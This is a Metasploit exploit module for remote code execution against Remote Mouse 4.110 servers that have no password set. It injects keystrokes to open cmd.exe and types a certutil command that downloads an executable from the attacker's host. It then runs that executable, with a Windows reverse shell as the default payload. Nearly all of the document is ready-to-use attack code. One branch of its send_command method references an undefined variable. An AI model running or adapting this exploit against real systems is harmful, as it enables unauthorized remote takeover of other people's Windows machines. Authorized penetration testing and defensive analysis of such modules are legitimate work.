Remote Mouse 4.110 Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Exploit::Remote::Tcp  
include Exploit::EXE # generate_payload_exe  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Remote Mouse RCE',  
'Description' => %q{  
This module utilizes the Remote Mouse Server by Emote Interactive protocol  
to deploy a payload and run it from the server. This module will only deploy  
a payload if the server is set without a password (default).  
Tested against 4.110, current at the time of module writing  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'0RPHON', # discovery, edb module  
'H4rk3nz0' # poc2  
],  
'References' => [  
[ 'EDB', '46697' ],  
[ 'CVE', '2022-3365' ],  
[ 'URL', 'https://www.remotemouse.net/' ],  
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]  
],  
'Arch' => [ ARCH_X64, ARCH_X86 ],  
'Platform' => 'win',  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' => [  
['default', {}],  
],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/shell/reverse_tcp'  
},  
'DisclosureDate' => '2019-04-15',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen  
}  
)  
)  
register_options(  
[  
OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),  
OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),  
OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\'])  
]  
)  
end  
  
def path  
return datastore['PATH'] if datastore['PATH'].end_with? '\\'  
  
"#{datastore['PATH']}\\"  
end  
  
def key_value(key)  
characters = {  
'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112',  
'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127',  
'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122',  
'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',  
'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',  
'Z' => '8[ras]111',  
  
'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',  
'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',  
'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',  
'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',  
'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',  
'z' => '7[ras]79',  
  
'1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',  
'6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',  
  
"\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',  
  
'+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',  
'>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117',  
'#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',  
'*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',  
'"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',  
'~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',  
',' => '7[ras]25', '.' => '7[ras]27'  
}  
"key #{characters[key]}"  
end  
  
def windows_key  
'key 3cmd'  
end  
  
def check  
connect  
response = sock.get_once  
disconnect  
if response.include?('SIN 15win nop nop')  
splits = response.split(' ')  
return CheckCode::Appears("Received handshake with version: #{splits.last}")  
end  
  
CheckCode::Unknown('Invalid response from target')  
end  
  
def send_command(command)  
if command == windows_key  
sock.put(command)  
elsif (command == "\n") || (command == "\b") # dont split this up  
sock.put(key_value(c))  
else  
command.each_char do |c|  
sock.put(key_value(c))  
end  
sock.put(key_value("\n"))  
end  
sleep(datastore['SLEEP'])  
end  
  
def on_request_uri(cli, _req)  
p = generate_payload_exe  
send_response(cli, p)  
print_good("Payload request received, sending #{p.length} bytes of payload for staging")  
end  
  
def exploit  
connect  
  
print_status('Connecting')  
print_status('Sending Windows key')  
send_command(windows_key)  
  
print_status('Opening command prompt')  
send_command('cmd.exe')  
send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440  
  
print_status('Sending stager')  
filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'  
register_file_for_cleanup("#{path}#{filename}")  
# I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2  
stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"  
start_service('Path' => '/') # start webserver  
send_command(stager)  
send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440  
  
print_status('Executing payload')  
send_command("#{path}#{filename} && exit")  
send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440  
  
handler  
disconnect  
sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert  
end  
end  
`